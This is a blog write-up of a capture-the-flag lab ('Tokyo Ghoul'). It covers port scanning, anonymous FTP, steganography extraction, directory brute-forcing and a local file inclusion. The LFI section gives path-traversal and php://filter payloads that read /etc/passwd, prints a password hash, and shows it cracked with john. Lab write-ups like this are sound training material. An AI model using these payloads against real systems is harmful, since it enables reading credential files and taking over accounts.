CTF Tokyo Ghoul

CTF
Created At :
Count:448 Views 👀 :
  1. nmap
  2. HTTP
  3. FTP
  4. Revers
  5. Stegano
  6. decode
    1. CyberChef
    2. dcode.fr
    3. base64
  7. Web enumeration
  8. LFI
  9. root

nmap

nmap -sV -p- -T4 10.10.183.217  -vvv

Output:

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Nothing with gobuster.
There if few notes that tell us to browse the FTP

FTP

wget -r ftp://anonymous@10.10.183.217


Users ?

Rize San
Kaneki

Revers

One ELF executable:

Strings on it:

Users ?

kamishiro
Kaneki

rabin2 -z is for revers.
I’m using dogbolt: https://dogbolt.org

Stegano

One image:

With steghide I can see an another file, I’m using the password You_found_1t:
https://book.hacktricks.xyz/crypto-and-stego/stego-tricks

steghide info rize_and_kaneki.jpg


Extract it:

steghide extract -sf rize_and_kaneki.jpg --passphrase You_found_1t

decode

CyberChef

https://gchq.github.io/

dcode.fr

base64

echo    ZDFyM2M3MHJ5X2NlbnRlcg== |base64 -d

Output:
d1r3c70ry_center

Web enumeration


I need to scan this directory:

gobuster dir -u http://10.10.183.217/d1r3c70ry_center/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,html


10.10.183.217/d1r3c70ry_center/claim/
This box keep crashing…

gobuster dir -u http://10.10.183.217/d1r3c70ry_center/claim -w /usr/share/wordlists/dirb/common.txt -x txt,php,html


10.10.183.217/d1r3c70ry_center/claim/contact-us.html
10.10.183.217/d1r3c70ry_center/claim/about-us.html

we have an email:
supersecurecompany@supersecurecompany.co
we add it to /etc/hosts

LFI

Main page:

http://10.10.183.217/d1r3c70ry_center/claim/index.php?view=flower.gif

http://10.10.183.217/d1r3c70ry_center/claim/index.php?view=../../../../../etc/passwd

I need to bypass the waf.
php://filter/convert.base64-encode/resource=../../../../../etc/passwd

https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd

We have the user and the hash.
kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:1001:1001:,,,:/home/kamishiro:/bin/bash
Crack it:

john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt pass.txt

kamishiro
password123

root

we can use tis script at root

I’m gonna spawn a revershell.

didn’t had the time to save, the machine had a crash, again.
I realy dislike this CTF, literaly unplayable, I don’t enven know where are the other flags.

after 3 crash I had no other choises.

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme